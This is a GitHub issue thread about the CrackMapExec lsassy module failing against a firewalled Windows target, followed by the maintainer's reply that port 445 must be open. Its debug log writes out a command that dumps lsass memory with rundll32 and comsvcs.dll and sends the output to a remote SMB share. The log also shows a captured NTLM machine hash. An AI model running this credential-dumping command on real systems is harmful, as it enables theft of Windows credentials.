### ISSUE TITLE
CME lsassy module cannot work against firewalled target

### ISSUE THREAD

**Issue by chr0n1k** [Hackndo/lsassy#33]
**Describe the bug**
When executing the lsassy module against a target with the Windows Firewall on, the only execution method that works is atexec [an issue has been opened on the wmiexec command execution on the crackmapexec repo]. Because of this there are errors in how lsassy executes with the atexec execution method. When the firewall is off on the target the wmiexec command execution can be invoked thus successfully dumping the hashes.

**Expected behavior**
A remote dump of the lsass.exe and parsing of the dump file via lsassy.
target: **Windows 10 18362 x64**
cme: **4.0.1dev - Bug Pr0n**

**Error Output**
DEBUG Executed command via atexec
DEBUG Generated argument XML:       <Arguments>/C powershell.exe -NoP -C "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\tmp.dmp full;Wait-Process -Id (Get-Process rundll32).id" &gt; \\192.168.1.153\NLOKA\oucvFSxf.tmp 2&gt;&amp;1</Arguments>
DEBUG Creating task \oucvFSxf
DEBUG Running task \oucvFSxf
DEBUG Calling SchRpcGetLastRunInfo for \oucvFSxf
DEBUG Deleting task \oucvFSxf
DEBUG Incoming connection (192.168.1.252,50020)
DEBUG AUTHENTICATE_MESSAGE (GOT\WINTERFELL$,WINTERFELL)
DEBUG User WINTERFELL$\WINTERFELL authenticated successfully
DEBUG WINTERFELL$::GOT:4141414141414141:b635f6e492d9e85624cb3886b83e7b95:01010000000000008007cd18bce5d5010ce526e326a10e24000000000100100059004800730059007000480050004500020010004f0065006a0073007400470044006d000300100059004800730059007000480050004500040010004f0065006a0073007400470044006d00070008008007cd18bce5d5010600040002000000080030003000000000000000000000000040000063588c65f063ba4b97b74983ae6ff6ddef1d8b7a4e49e474f4df8552b01d64ea0a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e0031002e003100350033000000000000000000
LSASSY      192.168.1.252   445    WINTERFELL       [+] Process lsass.exe was successfully dumped
LSASSY      192.168.1.252   445    WINTERFELL       [*] Parsing dump file with lsassy
DEBUG Lsassy command : lsassy -j -q --hashes : --dumppath 'C$/Windows/Temp//tmp.dmp' 'GOT/administrator:XXXXXX@192.168.1.252'
LSASSY      192.168.1.252   445    WINTERFELL       [-] Error while executing lsassy, try using CrackMapExec with --verbose to get more details
DEBUG Detailed error : Traceback (most recent call last):
  File "/usr/local/lib/python3.7/dist-packages/impacket/smbconnection.py", line 546, in openFile
    securityFlags, oplockLevel, createContexts)
  File "/usr/local/lib/python3.7/dist-packages/impacket/smb3.py", line 989, in create
    if ans.isValidAnswer(STATUS_SUCCESS):
  File "/usr/local/lib/python3.7/dist-packages/impacket/smb3structs.py", line 437, in isValidAnswer
    raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.7/dist-packages/lsassy/impacketconnection.py", line 83, in openFile
    fid = self.conn.openFile(tid, fpath, desiredAccess=FILE_READ_DATA)
  File "/usr/local/lib/python3.7/dist-packages/impacket/smbconnection.py", line 548, in openFile
    raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/bin/lsassy", line 10, in <module>
    sys.exit(run())
  File "/usr/local/lib/python3.7/dist-packages/lsassy/__main__.py", line 84, in run
    ifile.open(conn, file_path)
  File "/usr/local/lib/python3.7/dist-packages/lsassy/impacketfile.py", line 33, in open
    self._fid = self._conn.openFile(self._tid, self._fpath)
  File "/usr/local/lib/python3.7/dist-packages/lsassy/impacketconnection.py", line 91, in openFile
    raise Exception(e)
Exception: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

LSASSY      192.168.1.252   445    WINTERFELL       [-] Error deleting lsass dump : SMB SessionError: STATUS_NO_SUCH_FILE({File Not Found} The file %hs does not exist.)

**Additional context**
The issue regarding wmiexec against a firewalled target can be found here: https://github.com/byt3bl33d3r/CrackMapExec/issues/336

**Comment by Hackndo** [comment]
As explained in private messages, 445 needs to be open for lsassy to work.
